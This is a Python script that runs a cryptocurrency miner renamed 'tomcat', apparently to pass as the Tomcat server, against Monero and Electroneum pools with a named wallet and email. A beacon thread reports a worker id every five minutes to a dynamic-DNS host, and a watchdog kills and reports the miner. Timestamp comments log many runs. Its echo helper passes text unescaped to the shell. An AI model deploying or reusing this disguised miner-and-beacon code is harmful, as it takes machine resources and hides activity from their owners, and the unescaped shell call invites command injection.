import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:58:06.063524
#2018-02-17 16:46:04.075567
#2018-02-17 18:36:02.142765
#2018-02-17 20:23:05.022671
#2018-02-17 22:10:08.202422
#2018-02-17 23:54:03.718877
#2018-02-18 01:44:02.088251
#2018-02-18 03:32:01.719864
#2018-02-18 05:19:01.914363
#2018-02-18 07:11:07.524513
#2018-02-18 09:00:10.688826
#2018-02-18 10:47:07.030120
#2018-02-18 12:29:07.599449
#2018-02-18 14:17:06.864332
#2018-02-18 16:08:04.338997
#2018-02-18 17:57:02.244155
#2018-02-18 19:44:01.852594
#2018-02-18 21:31:06.593530
#2018-02-18 23:19:05.104893
#2018-02-19 01:06:07.461155
#2018-02-19 02:52:06.975201
#2018-02-19 04:39:07.085786
#2018-02-19 06:23:05.583103
#2018-02-19 08:12:06.836851
#2018-02-19 10:02:06.409390
#2018-02-19 11:51:01.252720
#2018-02-19 13:38:05.007091
#2018-02-19 15:25:08.754035
#2018-02-19 17:13:06.595206
#2018-02-19 19:01:01.682538
#2018-02-19 20:48:05.628158
#2018-02-19 22:36:05.083458
#2018-02-20 00:22:01.864319
#2018-02-20 02:09:05.360702
#2018-02-20 03:59:04.003232
#2018-02-20 05:43:04.374481
#2018-02-20 07:30:04.965089
#2018-02-20 09:14:05.156253
#2018-02-20 10:56:04.226041
#2018-02-20 12:44:07.240553
#2018-02-20 14:28:04.263720
#2018-02-20 16:12:15.485640
#2018-02-20 17:59:11.710053
#2018-02-20 19:49:08.150349
#2018-02-20 21:32:07.629167
#2018-02-20 23:14:07.240570
#2018-02-21 00:59:01.920411
#2018-02-21 02:46:03.795883
#2018-02-21 04:36:03.653458
#2018-02-21 06:23:06.171651
#2018-02-21 08:08:05.258247
#2018-02-21 09:56:06.724440
#2018-02-21 11:43:09.723176
#2018-02-21 13:34:01.399208
#2018-02-21 15:19:04.633880
#2018-02-21 17:10:03.026874
#2018-02-21 18:58:04.223891
#2018-02-21 20:39:01.451197
#2018-02-21 22:24:07.327861
#2018-02-22 00:13:07.938934
#2018-02-22 02:02:06.596273
#2018-02-22 03:48:06.419277
#2018-02-22 05:35:01.286874
#2018-02-22 07:20:08.480678
#2018-02-22 09:08:05.611110
#2018-02-22 10:56:01.413087
#2018-02-22 12:41:05.349157
#2018-02-22 14:27:07.409886
#2018-02-22 16:13:04.200140
#2018-02-22 17:58:07.797377
#2018-02-22 19:47:05.166295
#2018-02-22 21:37:04.520271
#2018-02-22 23:25:04.172912
#2018-02-23 01:12:07.978706
#2018-02-23 02:59:06.541209
#2018-02-23 04:47:02.123067
#2018-02-23 06:33:05.945772
#2018-02-23 08:22:01.940751
#2018-02-23 10:38:02.164129
#2018-02-23 12:32:08.209102
#2018-02-23 14:20:05.311095
#2018-02-23 16:10:11.502741
#2018-02-23 17:56:05.908030
#2018-02-23 19:41:04.852334
#2018-02-23 21:24:02.032569
#2018-02-23 23:12:05.696501
#2018-02-24 01:02:05.869833
#2018-02-24 02:54:04.969673
#2018-02-24 04:42:04.108842
#2018-02-24 06:26:01.450103
#2018-02-24 08:14:03.773633
#2018-02-24 09:58:04.834673
#2018-02-24 11:54:04.551318
#2018-02-24 13:44:05.247634
#2018-02-24 15:35:08.556503
#2018-02-24 17:29:03.745191
#2018-02-24 19:16:05.051890
#2018-02-24 21:03:04.791563
#2018-02-24 23:36:06.425120
#2018-02-25 02:56:08.289848
#2018-02-25 07:07:03.758371